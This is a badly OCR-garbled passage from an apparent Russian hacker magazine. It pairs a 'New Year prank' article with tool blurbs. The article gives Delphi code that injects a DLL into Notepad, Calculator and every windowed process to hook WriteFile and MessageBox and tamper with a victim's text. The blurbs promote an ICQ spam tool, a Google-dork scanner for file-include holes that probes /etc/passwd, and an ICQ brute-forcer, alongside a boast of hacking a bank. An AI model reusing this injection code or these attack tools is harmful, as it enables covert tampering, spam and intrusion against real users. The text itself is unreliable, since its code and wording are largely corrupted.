менее надежным, чем АЕЗ-128, использу- 
емый в ПАП. Помимо парольной защиты, 
в среде ѴѴіпбоѵѵз ІМТ/2000/ХР допустимо 
сохранение данных о правах доступа (дан- 
ных о владельце, группе, возможностях 
и аудит-информацию). Естественно, что 
это реально только при наличии у пользо- 
вателя достаточных полномочий. Сохра- 
нение этой информации может сделать 
невозможным обращение других лиц 
к файлам после распаковки (это зависит 
от файловой системы и собственно прав 
доступа), но замедляет процесс архивиро- 
вания/разархивирования. 

Итак, как ты уже понял, единственный 



способ взлома запароленного ПАП-архива 
— банальный брутфорс. К сожалению, 
в связи с используемым в ѴѴіпПаг методом 
шифрования скорость перебора паролей 
не превышает 20 секунд даже на Р4 3,8 ГГц 
и 1 Гб ООПМ памяти :(. Остается запастись 
словарем для перебора и надеяться, что 
юзер использовал простой и/или короткий 
пароль. 

□ Краткие выводы 

Просматривая документации к архивато- 
рам с функцией шифрования, очень часто 
можно прочитать, что архивы с паролями 
расшифровать нельзя. Но мы знаем, что это 
далеко не всегда так. При работе с кон- 
фиденциальной информацией это нужно 
обязательно учитывать. 

Поэтому, если ты хочешь надежно защитить 
важную инфу с помощью архиваторов, то: 

1 . применяй архиваторы с самым надеж- 
ным методом шифрования АЕЗ РупсІаеІ 

с 128-битным ключом: ѴѴіпРаг, РоѵѵегАгсІтіѵег 
или Шіптаіе2ір; 

2. старайся выбирать форматы, не подде- 
рживаемые программами восстановления 
паролей, например РАР версий 3.0 и выше, 
ТАР, 4АР и др.; 

3. задавай длинные (не менее восьми 
символов) пароли; с этой позиции подходят 
любые из перечисленных архиваторов, 
так как в каждом из них допустимая длина 
пароля превышает 56 символов, что вполне 
достаточно; 

4. останавливай выбор на нетривиальных 
паролях; используй в пароле пробелы 

и комбинации цифр, символов и букв, чтобы 
в итоге получалась не фраза из реальных 
слов, а абракадабра, — так пароль невоз- 
можно будет подобрать по словарю. =Н= 
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мила я пеночка! я очень хочу поздравить тебя с этим прекрасным 
праздником, новым годом! хочу пожелать тебе здоровья, счастья и 
успехов в наступающем году! Иі специально для твоя я сочинил этот 
чудесный и, надеюсь* красивый стих» 

Я хочу, чтюб на рассвете 
Ледяного января. 

Ты сказала мне * приветив 
милый, я лобж тебя!» 

ще раз поздравляю тебя, с пр| 




> Влюбленный хакер набираеттекст поздравления 



ДО НОВОГОДНЕГО ПРАЗДНИКА ОСТАЛИСЬ СЧИТАННЫЕ ДНИ, А ТЫ ТАК И НЕ ПРИДУМАЛ, ЧТО ПОДАРИТЬ СВОИМ ДРУЗЬЯМ И ПОД- 
РУГАМ. ПОКУПАТЬ ЧТО-ТО В МАГАЗИНЕ НЕ ПРЕТ - НЕТ ДЕНЕГ, ДА И ВСЕ ЭТИ НОВОГОДНИЕ СУВЕНИРЧИКИ УЖЕ ПРИЕЛИСЬ. 
ПОСЫЛАТЬ ПОПСОВЫЕ ЭЛЕКТРОННЫЕ ОТКРЫТКИ ТОЖЕ БЕЗ МАЗЫ - СКУКОТА, ДА И ТОЛЬКО. СЕЙЧАС Я МИГОМ РЕШУ ТВОИ 
ПРОБЛЕМЫ. МЫ СОЗДАДИМ ОРИГИНАЛЬНЫЙ ПОДАРОК СОБСТВЕННЫМИ РУКАМИ. ВО ВСЯКОМ СЛУЧАЕ, ГАРАНТИРУЮ, ЧТО ПРИ 
ПРАВИЛЬНОМ ПРИМЕНЕНИИ ТВОЙ СЮРПРИЗ БУДУТ ПОМНИТЬ КАК МИНИМУМ ГОД. 



Новый год можно все. Можно 
спалить видеокарту твоего друга 
под бой курантов, форматнуть 
винт во время речи Президента. 
Но мы не будем заниматься такими жестки- 
ми вещами. Наша с тобой задача — слегка 
потрепать нервы и повысить настроение 
друзьям. А для этого попытаемся написать 
новогодний набор сюрпризов, вытворяющих 
самые неожиданные вещи после запуска. 
Как ты помнишь, в прошлом номере я под- 
робно описал работу программ по перехвату 
АРІ методом сплайсинга, с помощью кото- 
рого мы решили непростую задачу. Сегодня 
мы вновь используем эту технологию, чтобы 
написать пару-тройку оригинальных запод- 
лянских штучек. Итак, поехали! 

О Великий и могучий... 

Представь ситуацию: твой приятель, ме- 
гахакер, тайно влюблен в прекрасную герлу 
и пишет ей особенное новогоднее поздрав- 
ление. Он превзошел сам себя и сочинил 
сентиментальное стихотворение, которое 
может согреть сердце даже памятнику на 
главной улице города. Поклонник надеется, 
что хотя бы в Новый год он получит внимание 
своей избранницы. Но как бы не так! Ведь ты 
горишь желанием отомстить ему за перво- 
апрельский дефейс своего сайта :). Я тебе 
в этом немного помогу. 

Сделаем небольшое техническое отступле- 
ние, чтобы ты понял смысл наших с тобой 
действий. Всем известно, что бедняга 
поіераб.ехе вынес бессчетное количество 
пыток. Он, пожалуй, главная жертва всех 
экспериментов связанных со сторонними 
программами, которые пишут все, кому не 
лень. Мы не будем выделяться из толпы, поэ- 
тому блокноту еще раз придется потерпеть. 
Суть нашей первой новогодней шутки будет 
заключаться в следующем: при сохранении 
текста в файл используется АРІ-функция 
ѴѴгііеРіІе; мы ее перехватим и изменим ука- 
затель на записываемые данные. По новому 



адресу будет лежать в целом оригинальный 
текст, но с небольшими отличиями — после 
каждой запятой наша программа вставит 
нецензурное слово из трех, четырех или пяти 
букв на выбор :). 

А теперь рассмотрим возможные пос- 
ледствия такого прикола. После умелого 
впаривания тобой злостного кода твой 
ничего неподозревающий товарищ решает- 
ся отправить поздравление на е-таіі юной 
красавице. Предположим, что текст будет 
следующим: 

ДУШЕЩИПАТЕЛЬНОЕ ПОЗДРАВЛЕНИЕ 
Милая Леночка ! Я очень хочу поздра- 
вить тебя с этим прекрасным праздни- 
ком — Новым годом! Хочу пожелать тебе 
здоровья, счастья и успехов в насту- 
пающем году! И специально для тебя 
я сочинил этот, надеюсь, красивый 
стих ! 

Я хочу, чтоб на рассвете 
Ледяного января 
Ты сказала мне: «Приветик, 

Милый, я люблю тебя!» 

Еще раз поздравляю тебя с праздником, 
родная ! 

Пока я писал этот текст, по моей щеке 
катилась скупая мужская слеза — стало 
жалко парня, над которым мы собираемся 
постебаться :). Но что делать: жизнь — суро- 
вая штука. Поэтому идем за пивом, включаем 
мозг и пишем гениальную программу для 
укрощения блокнота. 

Технику перехвата мы уже освоили в про- 
шлом номере, поэтому сейчас нам надо 
определиться только с одним вопросом: 
«Откуда мы узнаем, что процесс поіераб.ехе 
запущен и мы сможем в него внедриться?» 
Есть вариант с инжектом во все процессы 
и перехватом функции 2ѵѵСгеаіеРгосезз, 
но при таком способе от нашего прикола 



будет очень непросто избавиться и это 
перерастет из простой забавы в настоящее 
вредительство для пользователя. Мы же 
— народ мирный, поэтому решаем пойти 
другим путем. Каждые п секунд будем 
искать окно с классом ІМоіерасІ и в случае 
успешного поиска проверим, загружена ли 
наша библиотека в адресное пространс- 
тво этого процесса. Если не загружена, то 
будем подгружать ее, а она в свою очередь 
сделает небольшую пакость :). 

Вот так будет выглядеть код проекта, сле- 
дящего за процессом (полный исходник ты 
можешь взять на диске): 

КОД НЕЗАМЫСЛОВАТОЙ СЛЕДИЛКИ 

щ 

Шпб, РЮ, рНапсіІе: сЬюгб; 

//Функция для проверки наличия моду- 
ля шаіп . 611 

//в адресном пространстве чужого 
процесса . 

Типсбіоп ІзМобиІеЬоабеб (ІрРЮ: 

сЛлюгб) : Ьооіеап; 

ѵаг 

ЬЗпарзЬоб : сЛлюгб; 

Мобиіе: ТМОБІІЬЕЕЫТКУ32 ; 




Кезиіб : = ТНЦЕ; 

Мобиіе. сЬ/ЗІ 2 е: = зігеоі 
(МООЦЬЕЕЫТКУ32) ; 

ЬЗпарзЬоб : = геабеТоо1Ье1р323пар5]поб 
(ТН32СЗ_ЗЫАРМООІШЕ, ІрРЮ) ; 
Моби1е32Еігзб (НЗпарзНоб, Мобиіе) ; 
гереаб 

Проз ('шаіп. 611', Мобиіе. 

згМобиІе) > 0 Ыпеп Ьедіп 

Кезиіб : = ЕАЪЗЕ; 

ехі,; 

епб; 

ипбіі поб Моби1е32Ыехб (ЬЗпарзЬоб, 
Мобиіе) ; 



епб; 




мМІе ТКЫЕ бо Ьедіп 
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> Неожиданное поздравление от калькулятора 
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> Калькулятор, требующий зарегать винду. 




> Используй мои 
наработки лишь 
в благих целях, иначе 
можешь загреметь 
по статье 273 УК РФ. 
Ни автор, ни редак- 
ция за последствия 
таких «приколов» 
ответственности не 
несут. 




>Все исходники 
и бинарники моих 
«веселых» программ 
ты можешь найти на 



//Запущен ли блокнот? 

ЫМпб: = РіпсШіпсіом ( ' Ыоберасі ' , піІ) ; 
іі Шпб о 0 ЕДеп Ьедіп 
//Запущен. Получаем РЮ процесса. 
СеШіпбоіл/ТДгеасІРгосеззІсІ (Шпб, РЮ) ; 

/ /Включаем нужные привилегии, может не понадо- 
биться, но если в системе 
//недостаточно прав, то нужно вызывать. 
ЕпаЫеОеЬидРгіѵіІедеЕх ( ШѴАЬЮ_НАЮ:ЬЕ_ 

ѴАШЕ) ; 

рНапсіІе : = ОрепРгосезз (РВОСЕЗЗ_АЪЪ_АССЕЗЗ, 
ЕАЬЗЕ, РЮ) ; 

//Модуль шаіп. 611 уже загружен в адресное про- 
странство процесса? 
іі ІзМобиІеЬоабеб (РЮ) бДеп 
//Нет? Значит, инжектим его. 

Іп^есЮИ (рНапсНе, рСДаг (ехбгасбДІерабД 
(рагатзбг (0)) + ' \таіп. 611')); 

ИИ 

Зіеер (30 00) ; 

■' 

Вот, как видишь, программа каждые 3 секунды ищет за- 
пущенный поіераб.ехе, проверяет в нем наличие модуля 
таіп.сІІІ и, если таковой отсутствует, инжектирует его 
в процесс. Далее привожу самое интересное место 
таіп.сІІІ (весь код лежит на диске): 



нашем диске. 



ЗАПОДЛЯНСКАЯ ФУНКЦИЯ ЗАМЕНЫ 
бипсбіоп ШгібеЕіІе (ДЕіІе: ТНапсІІе; 
сопзб Виббег; пЫитЪегОбВубезТоІлГгібе : 

БЖЖБ; ѵаг ІрЫитЪегОбВубезІлГгіббеп : ОЖЖБ; 
ІрОѵегІарреб: РОѵегІарреб) : ВООД; зббсаіі; 
Ьедіп 



азт 




ЫемВиббег : = ЗбгіпдВерІасе (рСДаг ЩВиббег) , 
’, б#я ' , [ гІКерІасеАІІ , гбІдпогеСазе 
] ) ; // Формируем новую строку 
азт/ / Подмена указателя 
тоѵ еЬх, [ЫемВиббег ] 
тоѵ Виббег, еЬх 
рораб 

Н 



/090 



ТМгібеЕіІе (ДЕіІе, Виббег, ІепдбД (рСДаг 
(0Виббег) ) , ІрЫитЪегОбВубезІлГгіббеп, 
ІрОѵегІарреб) ; 

Ш Я 

Ну вот, с первым новогодним подарочком мы определи- 
лись. Настало время представить последствия такого 
западла. Я знаю, это трудно, но поставь себя на место 
юной красавицы Леночки, которая январским утром 
(поверь, она не будет сидеть за компом в новогоднюю 
ночь:)) проверила свою почту и нашла в аттаче наше 
замечательное поздравление, (которое, кстати, ты без 
цензуры можешь лицезреть на скриншоте). Будь я Ле- 
ночкой, убил бы за такое :). 

А теперь на полном серьезе рассмотрим технические 
недостатки нашей шутки. Во-первых, если жертва на- 
пишет поздравление непосредственно в почтовике или 
в ѵѵеЬ-интерфейсе таіі-сервиса, замены не произойдет. 
Во-вторых, я намерено не стал скрывать главное окно 
как этой, так и последующих программ. Я не троян- 
мейкер, а если ты на свой страх и риск все же хочешь 
«полноценных» приколов, то модернизировать мой 
код — как 2 байта переслать. Теорию я тебе расписал, 
а на практику у тебя есть как минимум ІОдней. Поэтому 
дерзай :). 

□ К чертям математику... 

Что такое Новый год? Помимо елки, подарков, 
шампанского и Деда Мороза, это лишние затраты на 
подарки и организацию поляны :). Как правила, все 
финансы считаются, не отходя от компа, а конкретно 
— на самом обычном калькуляторе. Интересно, как 
изменится в лице твой товарищ, когда при подсчете 
затрат увидит в числовом поле калькулятора ка- 
кую-нибудь фразу. Например, такую: «Уважаемый, 
ИМЯ_КОМПЬЮТЕРА! Калькулятор просит Вас заре- 
гистрировать ѴѴіпбоѵѵз». Или такую: «Все расходы на 
Новый год спонсирует МісгозоЙ». На первый взгляд 
это может показаться немного банально, но никто не 
мешает тебе придумать свою более оригинальную 
строку :). Можно намутить чего-нибудь с названием 
кнопочек и прочего, но это не имеет отношения к пе- 
рехвату АРІ, который мы здесь решили использовать. 
Впрочем, руки я тебе не связываю — доработать прогу 
ты можешь всегда. А пока я расскажу о реализации 
вышеупомянутого прикола. 
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>Кодим до посинения 



Мониторить наличие процесса саіс.ехе мы 
будем так же, как и в случае с блокнотом. 

Для этого в исходнике проекта, следящего за 
процессом, надо изменить всего лишь одну 
строку: 

Шпб:= РіпсШіпсіом ('ЗсіСаІс', піі) ; 

таіп.сІІІ тоже надо немного подкорректиро- 
вать, фукнцию перехвата — переписать, она 
будет совсем простой: 

СЛЕГКА ИЗМЕНЕННАЯ ФУНКЦИЯ МОДУЛЯ 
ГипсГіоп ИЗеШіпбомТех-Ш (ЬЛлГпсі : НШО; 
ІрЗГгіпд : РМібеСНаг) : ВООЬ; зГбсаІІ; 



Ъедіп 

азгп 

ризНаб 

Ж 

ТЗеШіпсісшТех-Ш (СебРагепб (Шпб) , 
ІрЗГгіпд) ; 



азгп 




ТЗеШіпсіоіл/Тех-Ш (Шпб, ЫемВиРРег ) ; 

В 

Используемый для заполнения ЫеѵѵВиІІег 
код должен быть исполнен однократно, 
поэтому его можно поместить в процедуру 
ЭШЕпігуРоіпЦ событие ОІ_І__РРОСЕ83_ 
АТТАСН: 

ЕЩЕ ОДНО ИЗМЕНЕНИЕ 
бѵЗіге : = зігеоГ (ИзегИаше) ; 
Ое'ЬИзегИате (ІІзегЫате, сііл/Зіге) ; 
Ие^ЗГгіпд:= 'Уважаемый ' + ИзегИате + 
' , пожалуйста, зарегай Міпскшз ! ! ! ' ; 
ИемВиРРег : = СеШетогу (ЬепдбЪ. 
(ЫемЗбгіпд) * ЗігеОГ (ТлГібеСНаг ) + 1 ) ; 
ЗГгіпдТоТлГібеСІіаг (Ыеіл/Збгіпд, 
ЫемВиРРег , ЬепдбЪ. (Ыеіл/Збгіпд) + 1 ) ; 
ЕгееМетогу (Ие^ВиГГег) ; 



> Кругом странные поздравления :) 
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С Новый ГОДОИ, ОТМОрОФОКІМ 


Длина хеша равна 01 




С Новым годои, отнорожжП 1 




1 ок ] 



ООМЗЫТЕхОк^ЬНННЗМбВ 




Один взмах пера, и очередной прикол го- 
тов:). Ты теперь можешь глумиться не только 
над блокнотом, но и над калькулятором. 
Настало время покорить вообще всю винду 
товарища. Вперед к приключениям :)! 

О Новый год везде... 

Пора завязывать с этими детскими играми. 
Скажем так, это была разминка. Теперь, 
чтобы праздничная обстановка была про- 
чувствована сполна, распространимся по 
всей системе глобально. Что мы можем для 
этого сделать? Подумав минут 5, я решил 
далеко не ходить и сделать простой перехват 
всех функций МеззадеВох в системе, моди- 
фицируя текст сообщения таким образом: 

Нарру Ыем Уеаг, Беаб Могог ! ! ! 



[Оригинальный текст сообщения] 

С Новым годом, отморозок! ! ! 

Вот и все. Сообщения в системе выползают 
довольно часто, поэтому твой приятель (или 
неприятель) действительно сможет ощутить 
приближение праздника :). 

Перейдем к кодингу. С какими трудностя- 



ТРАГИЧЕСКАЯ ЗАМЕНА 

Примерно 1 0 лет назад, когда компью- 
теры были еще в диковинку, произошла 
одна замечательная история. Девушка 
устраивалась на работу в хорошую фирму 
и в качестве первого задания должна 
была написать какой-то научный доклад. 
Дома у нее своего компьютера не было, 
поэтому она работала за компом своего 
брата. А неудачник-братишка поймал 
вирус, который в популярном тогда 
редакторе І_ехісоп заменял абсолютно все 
знаки препинания нецензурными выраже- 
ниями. Причем делал он это при отправке 
документа на печать. Бедная девушка, 
естественно, ничего не заметила и сдала 
работу своему начальнику. Был большой 
скандал, но потом девицу все-таки реаби- 
литировали и взяли на работу. 

К чему я все это? Не повторяй таких злых 
приколов с твоими товарищами. Это 
может плохо кончиться. А если и решил 
постебаться над другом, то обязательно 
сообщи ему об этом в кратчайшие сроки, 
пожалей бедолагу. 
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фігіл 0&АЙЙ* фшѵъл СП*И*Л 1 

Нкл^'д Леночка! Я очень кочу поэлрдвнгь і еяя с ім им прекрасным ораэдннком, ел*, 
Новии годам! Качу поделать теве здорсіаья, сл*, счастья н ус пени в в н ас т упдвцом 
году! Н специально для тебя я сочинил этот чудесный м, ел*, наиеись, ел*, 
крдснвиД с тик! 

Я Уйчу п кл*. чтоб на р ас с Й РТР 
Ледяного января, ел*. 

Ты сказала пне «примет ик т вл* э 
Милый, О л*, я лвОлв твой!» 

Еце раз поздравляю тейя, йл* к с праздником, Вл*, родная! 

> Посмотри, во что превратился текст после сохранения 



ми мы столкнемся? В первую очередь это 
инжект во все программы. В принципе, 
перебрать все процессы и проинжектить 
туда сІІІ труда не составит, но как же быть 
с вновь созданными процессами? Можно 
поставить глобальный перехват функций 
создания процесса, но это сложно и не- 
спортивно. Есть более элегантное реше- 
ние, которое основано на использовании 
ѴѴіпбоѵѵз-хуков. Предположим, что в собы- 
тии □І_І__РРЮСЕ55_АТТАСН мы установим хук 
на какое-нибудь сообщение, например ѴѴН_ 
ОЕТМЕЗЗАОЕ. И любая программа, которая 
имеетхоть одно окно (эй, баклан, он сказал 
«имеет», гы-гы), обязательно это сообщение 
будет использовать, а значит и наша сІІІ будет 
подгружена в адресное пространство всех 
«оконных» процессов. Но самое главное, 
что пока хук не снят, сІІІ будет подгружаться 
со всеми вновь созданными процессами, 
имеющими окно. Другими словами, наш 
прикол будет работать вплоть до перезагруз- 
ки. Еще одна проблема в том, что функций 
МеззадеВох фактически две (с индексом А 
и ѴѴ; первые в качестве параметров использу- 
ют АЫЗІ-строки, вторые — ІЛЧІССЮЕ), так что 
перехватывать надо две функции, а не одну. 
Что ж, поехали! Для начала я приведу код 
лоадера, который будет начинать работу 
нашей сІІІ. 

НАШ НОВОГОДНИЙ ЗАГРУЗЧИК 

ргодгаш Ьоабег; 

изез 

Шіпбспл/з ; 

ЬоабЫЪгагу ('шаіп. 611'); 

Зіеер (ІЫГШІТЕ); 

Ш 

Приведенный код, я думаю, в комментариях 
не нуждается. Теперь давай подробно раз- 
берем код таіп.бІІ — он довольно здорово 
преобразился: 

ГЛАВНАЯ БИБЛИОТЕКА НАШЕГО ПРИКОЛА 
ргосебиге ОЬЬЕпГгуРоіпІ. (бмКеазоп : 





сазе бмКеазоп о! 



БІШ_РК.ОСЕ55_АТТАСН : 

ВН 

ЗеГСІоЬаІНоок (); 

НоокРгос ('изег32. 611', 

' МеззадеВохА ' , ѲИМеззадеВохА, 6 
ТМеззадеВохА) ; 

НоокРгос ('изег32. 611 ' , 

' МеззадеВохѴ? ', 0ИМеззадеВохѴЩ 0 
ТМеззадеВохМ) ; 

ИпісобеТехк : = ' Нарру Ием Уеаг! ! ! ' ; 

ДИ 

ВІШ_РК.ОСЕ53_БЕТАСН : 

шшш 

ИпНоокСобе ( 0ТМеззадеВохА) ; 
ЧпДоокСобе ( 0ТМеззадеВохѴ?) ; 
епй; 
епсі; 

ш 

Как видишь, перехват устанавливается на 
две функции. Не понятной остается лишь 
функция ЗеіОІоЬаІНоок. Собственно, эта 
функция и устанавливает хук (ее исходник 
ты можешь найти на ЭѴЭ). Любой человек 
хоть немного знающий, что такое хуки, пре- 
красно поймет, что здесь происходит. 
Теперь рассмотрим процедуру перехвата 
МеззадеВохА. Тут все до безобразия просто: 

ПЕРВАЯ ФУНКЦИЯ ПЕРЕХВАТА 
РипсГіоп ИМеззадеВохА (Шпб: НШО; 
ІрТехГ, ІрСарГіоп: РСДаг; иТуре: 
ШИТ) : Іпкедег; зкбсаіі; 

Ьедіп 




Ие^ТехГА:= 'С Новым годом, отморо- 
зок! ! ! ' + #13#10#13#10 + ІрТехГ + 
#13#10#13#10 + 'С Новым годом, отмо- 
розок ! ! ! ' ; 
азш 



ТМеззадеВохА (Шпб, рСНаг 
ЩемТехГА) , ІрСарГіоп, иТуре) ; 

ШШ 



Как видишь, в коде выделяется новый 
буфер и передается вместо старого ори- 




гинальной функции. Функция перехвата 
МеззадеВохѴѴ будет выглядеть иначе в силу 
того, что работа с ІЛЧІССЮЕ-строками про- 
исходит по-другому. 

ВТОРАЯ (И ПОСЛЕДНЯЯ) ФУНКЦИЯ ПЕРЕХВАТА 
ГипсГіоп ИМеззадеВохТлГ (Шпб: НШШ; 
ІрТехГ, ІрСарГіоп: РѴЛбеСДаг ; иТуре: 
ШИТ) : ІпГедег; зкбсаіі; 

азш 

ризДаб 

ЫемТехШ : = (ЗеШетогу ( (Ізкгіешл/ 
(ІІпісобеТехк) + Ізкгіепм (ІрТехГ) ) * 
ЗігеОГ (МібеСПаг) + 20) ; 

ІзГгсруѴ? (ИемТехШ, ИпісобеТехІ:) ; 
ІзГгсаШ ЩемТехШ, #10#13#10#13) ; 
ІзГгсаШ (ЫемТехШ, ІрТехГ) ; 

ІзГгсаШ (ЫемТехШ, #10#13#10#13) ; 
ІзГгсаШ (ЫемТехШ, ИпісобеТехІ:) ; 
азш 
рораб 

ТМеззадеВохѴ? (Шпб, ЫемТехШ, 
ІрСарГіоп, иТуре) ; 

ЕгееМетогу (ЫемТехШ) ; 
епб; 

Обрати внимание, что память, которую мы 
выделили под новый буфер, после использо- 
вания необходимо освободить. 

Этим занимается функция ЕгееМетогу. 

В противном случае произойдет утечка 
памяти, которая приведет к нехорошим 
последствиям. Формирование буфера 
с новым текстом тоже идет по-другому — с ис- 
пользованием специальных функций для 
ІІЫІССЮЕ. В остальном все идентично случаю 
с МеззадеВохА. 

О И это все?! 

Нет, это не все :). На этом движение нашей 
заподлянской мысли не останавливается. 
Чтобы быть полностью удовлетворенным, 
предлагаю тебе в качестве домашнего зада- 
ния написать программу-замену всех про- 
цессов оригинальными именами (зпоѵѵ.ехе, 
запіасіаиз.ехе), интерактивный заменитель 
печатаемых букв или генератор неприличных 
обоев на рабочем столе :). 

Мыслей много, однако рамки статьи не 
позволяют подробно описать все приколы, ро- 
дившиеся в моей шальной голове :). Поэтому 
передаю компилятор в твои жилистые руки. 
Дерзай, товарищ. И конечно, счастливого 
Нового года! =Н= 
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ПРОГРАММА: ІМСА5ТЕК Е-МАККЕТЕК 

ЕІЧТЕРРРІЗЕ9.2 

ОС: ѴІІЧ&0Ѵ5 2000/ХР 

АВТОР: С&ЗЗОРТУАКЕ 




>Спамим поасям 



В прошлых выпусках «Х-Тооіз» я уже не раз 
выкладывал софтины для спама мыл. Но ведь 
спамеры не ограничиваются лишь рассыл- 
ками по е-таіі-адресам, они также активно 
используют ІСО-спам. Тебе наверняка неод- 
нократно приходили левые мессаги на твой 
блатной шестизнакс предложением посетить 
очередной порник или купить ящик виагры. 
Причем зачастую никакие флуд-фильтры 
не помогают, и в асю продолжает валить 
спам. Это прискорбное явление и побудило 
меня выложить в нынешнем номере журнала 
такую замечательную тулзу, как ІМСазіег 
Е-Магкеіег Епіегргізе. Именно с ее помощью 
ты сможешь пополнить армию асечных 
спамеров =). Принцип действия программы 
прост. Т ы загружаешь лист зарегистриро- 
ванных уинов вида «ісц: раззѵѵогб», и тулза 
от их имени рассылает сообщения по асям. 

На вкладке «Гіііег» ты можешь настроить 
фильтрацию уинов по вбитым в них дан- 
ным. Согласись, что не имеет смысла слать 
предложение о покупке виагры девушкам из 
Северной Ирландии, гораздо эффективнее 
настроить фильтр на амеров в возрасте 
40-50 лет, указав в графе Сепсіег значение 
Маіе. Фильтр поддерживает такие поля, как 
Сепсіег, Аде, І_апдиаде, Соипігу, Зіаіе, Сііу, 
Іпіегезіз, Кеуѵѵогб, ѴѴогк. Кроме того, не за- 



/094 



будь поставить галку напротив «ЗеагсІп Опіу 
Опііпе ІІзегз», если ты хочешь спамить только 
по номеркам, находящимся в онлайне. В раз- 
деле Меззаде тебе необходимо написать 
само сообщение, которое и будет рассылать- 
ся утилой. Например, строчка «НеІІо, %І\ІІСК» 
выведет юзеру с ником ВІаЫа сообщение 
«НеІІо, ВІаЫа», аналогично следует исполь- 
зовать значения «%ГІРЗТ» и «%І_АЗТ». А вот 
на вкладке «Аиіо Везропбег» тебе предла- 
гается настроить автоответы ботов. Кроме 
стандартных фраз типа «НеІІо» и «Вау», 
в ответ на «Рискеб Ьоі» ты можешь запросто 
послать америкоса к черту — «Со іо а НіеІІ, 
%І\ІІСК» =). Так что весь словарный запас 
ботов ограничивается лишь твоей фанта- 
зией, которая, к слову, у хакера должна 
быть богатой :). Также софтина имеет свой 
блэк-лист, включающий в себя список 
нежелательных уинов. Плюс ко всему, тебе 
предоставляется удобная система логирова- 
ния, с помощью которой ты сможешь четко 
контролировать процесс рассылки. 

Одним словом, инсталлируй и пользуйся! 
Уверен, тулза тебя приятно удивит =). 



ПРОГРАММА: ІМСІ_ІЮЕ РІХКЕК 

ОС:*ІЧІХ/УІМ 

АВТОР: ЫЕИМ 




> Инклуд, найденный сканером 



Скорее всего, ты успел обратить внимание 
на название этой тулзы — оно говорит само 
за себя =). Но обо всем по порядку. Ты, 
конечно же, привык использовать в своих 
грязных делах столь любимый хакерами 
всего мира Г угл. Поисковик не раз выручал 
и меня при взломе очередного крупного ре- 
сурса. Но вот незадача: в повседневном ба- 
гоискании очень напрягает вбивать вручную 



с десяток запросов один за другим. Поэтому 
многие юзают различные Г угл-сканеры или 
принимаются за написание собственных. 

Но создание универсального сканера 
— скорее мечта, чем реальность, поэтому 
для поиска конкретных багов приходится 
использовать специализированный сканер. 
Сегодня я хочу представить тебе один из 
таких — Іпсіибе Рискег. Этот перл-скрипт 
предназначен для поиска инклуд-багов при 
помощи Гугла. 

Ты можешь возразить, мол, инклуды давно 
не рулят ит.п., но будешь частично не прав. 
Не спорю, сейчас рулят вовсе не инклуды, 
но это нисколько не мешает криворуким про- 
граммистам создавать бажные веб-продукты 
с данной уязвимостью. Ярким примером 
служит мой взлом Сберегательного банка 
Украины (11/06). Комментарии, думаю, 
излишни =). Но вернемся к сканеру. Первое, 
что необходимо отметить, — это возмож- 
ность использования проксиков: 

# ргоху ІР 

$ргоху_1юз1: = "127.0.0.1 м ; 

# ргоху РОКТ 
$ргоху_рогЩ = 65011; 

Смело вбивай ІР своего прокси-серве- 
ра в значение переменной $ргоху_іюзі, 
а порт указывай в $ргоху_рогі. Здесь все 
понятно. Едем дальше. При запуске скрипт 
коннектится через проксик к Гуглу, после 
чего отсылает ему запрос на поиск бага 
(инклуда): 

$зеагс1і= м 1лГагпіпд+ореп+1і1е+ореп%2 8%2І 
9 + іпиг1%ЗА. Ы:т+1і1е1:уре%ЗАр]ір м ; 
$з-Ьаг-Ь=60 ; 

$д0 0д1е="ш\ш. доодіе . ги/зеагс]гі?д=$зе 
агс1і&]п1=еп&1г=&з1:аг1:=$з1:аг1:&за=Ы" ; 
$Доз1:з_1і1е= м $з1:аг1: . Іод" ; 
$е^с_раззжі=" . 

I. / . /е-Ьс/раззмсі" ; 

$Т1:і=" . ІЩт" ; 

$тосііТесі_игІ 2 = м тосііТесі. Іод" ; 
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Как ты видишь, значение, передаваемое пе- 
ременной $зеагсб, — этой есть запрос к по- 
исковику. При желании ты вполне можешь 
заменить его своим. Далее идет объявление 
переменной $еІс_раззѵѵсІ, используя кото- 
рую, скрипт и выявляет наличие инклуда на 
сайте. Я не буду приводить здесь полный код 
сорца, так как, во-первых, это займет весь 
выпуск «Х-Тооіз», а во-вторых, сканер лежит 
на нашем диске. Пользуйся =). 

ПРОГРАММА: 9ЕШКЕ& МЕ99АСЕ ТКА№РЕК 
9Ѵ9ТЕМ 

ОС: ѴІГЧСО Ѵ9 2000/ХР 

автор: і№екскоі№ соммілчітѵ 

Помнится, в одном из прошлых номеров 
я предлагал тебе использовать 53Т как 
аналог 100. Причиной являлось 1 28-битное 
шифрование всех отправляемых сообщений 
55Т-клиентом. Тогда же я упоминал о том, что 
в андеграунде ведется разработка софта, 
позволяющего сделать общение в сети более 
безопасным. Что ж, хочу тебя обрадовать 
— такой софт был создан ! И он лежит на 
нашем диске :). Имя ему — Зесигеб Меззаде 
Тгапзіег Зузіет (зоигсеіогде. пеі/ргоіесі/ 
збоѵѵіііез. рНр?дгоир_ісІ=1 77613). Этатулза 
обладает рядом достоинств. Во-первых, она 
работает почти со всеми ІСО-клиентами, 
во-вторых, она бесплатная (для тебя), а в-тре- 
тьих, софтина носит статус ОрепЗоигсе. 

Все передаваемые сообщения надежно 
криптуются утилитой при помощи твоего 
личного ключа. Для успешного функциониро- 
вания тулзы тебе понадобится Ргатеѵѵогк 2.0, 
который ты всегда можешь слить с офици- 
ального сайта Місгозоіі. Далее тебе следует 
запустить ЗесигеІСО. ехе, выбрать Рііе -> 

Абб ІосаІ ШИ (СігІ+Ы) и вписать туда свой 
номер аси. Длину ключа также рекомендую 
указать дефолтную (4096 бит). После этого 
будет произведена генерация секретного 
ключика. Для успешного использования 
тулзы стоит всего лишь настроить клиент на 
коннект через РІТТРЗ Ргоху на 1 27.0.0. 1 :31 28. 
Затем ты можешь скопировать свой личный 
ключ (ЗесигеІСО -> Рііе -> Сору риЫіс кеу) 
и передать его другу, который произведет 
у себя аналогичные действия. Затем тебе 
нужно будет лишь добавить его уин (Рііе -> 
Абб Ретоіе 11114) и ключик, полученный от 
него. Вот и все. РІадежный канал связи готов 
к бою =). 

Р. 3. Сорцы, бинарник и последнюю версию 
РгатеѴѴогк ты найдешь на диске в архиве 
с тулзой. 



ПРОГРАММА: ВАСК2ІС0 
ОС: ѴІІЧ00Ѵ9 2000/ХР 

АВТОР: Ы5 




> Отличный инструмент для брута ась 



Наверняка ты мечтаешь заполучить какой-ни- 
будь блатной номерок аси (например, маски 
ххуухх/уххххх =)). А если ты уже являешься 
его счастливым обладателем, то никто не 
мешает тебе подарить подобный уин своей 
девушке. Уверен, она оценит такой подарок :). 
Дело за малым — добыть такой номер. Здесь 
